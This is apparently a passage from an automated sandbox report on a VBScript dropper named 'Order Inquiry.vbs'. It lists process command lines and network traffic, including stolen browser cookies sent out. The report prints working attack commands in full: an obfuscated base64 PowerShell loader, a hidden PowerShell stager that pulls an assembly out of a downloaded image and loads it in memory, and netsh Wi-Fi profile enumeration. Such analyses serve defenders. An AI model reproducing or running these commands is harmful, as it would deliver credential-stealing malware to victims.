40 16 ad 1e 25 68 dc 5a 1d b9 e5 48 ac 39 c3 7c dc 39 Data Ascii: X,7_Chromium/Cookies.txtKr0u(1<.$ Rn:-BPRRiL`\|3&*p(s&dA()0N^b>5L2\|[ /PeAw#&M\G~U&:~<!,ImLgsdx,{IUi/@%hZH9\|9
2024-06-14 13:15:28 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 14 Jun 2024 13:15:28 GMT Content-Type: application/json Content-Length: 20 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kc49QY8jI%2BMdPlzyygUBjBQTKt31piijLJD5awadGKwsfx83T%2FRJysDs10fe1oK7PqAmOXWIOtKXAXBXsyk8yZhp%2F66SZlDQleidldBcO5jBSOa%2FZOzh4r977pW1WGj%2BkBB9LY9xPASezg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 893a96d9ab6e4775-DFW alt-svc: h3=":443"; ma=86400
2024-06-14 13:15:28 UTC	20	IN	Data Raw: 43 6f 75 6e 74 72 79 20 6e 6f 74 20 64 65 66 69 6e 65 64 2e Data Ascii: Country not defined.

Target ID:	0
Start time:	09:14:58
Start date:	14/06/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs"
Imagebase:	0x7ff7d1bb0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	09:15:01
Start date:	14/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBSDgTreHUDgTrebgBQDgTreEUDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBkDgTreHIDgTrebwB3DgTreHMDgTreLwDgTrexDgTreDcDgTreLgDgTre5DgTreDMDgTreLgDgTrezDgTreDIDgTreMQDgTreuDgTreDMDgTreOQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBcDgTreFwDgTredDgTreBzDgTreGMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreFwDgTreQwBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreIDgTreBGDgTreGkDgTrebDgTreBlDgTreHMDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreYQBiDgTreHUDgTrecgByDgTreGEDgTrecgDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	09:15:01
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	09:15:02
Start date:	14/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	09:15:12
Start date:	14/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"
Imagebase:	0x7ff7a9af0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	09:15:12
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	09:15:15
Start date:	14/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xcd0000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Target ID:	12
Start time:	09:15:23
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	09:15:23
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	09:15:23
Start date:	14/06/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff63cc90000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	15
Start time:	09:15:23
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x230000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	16
Start time:	09:15:24
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x15c0000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	17
Start time:	09:15:25
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0xc30000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true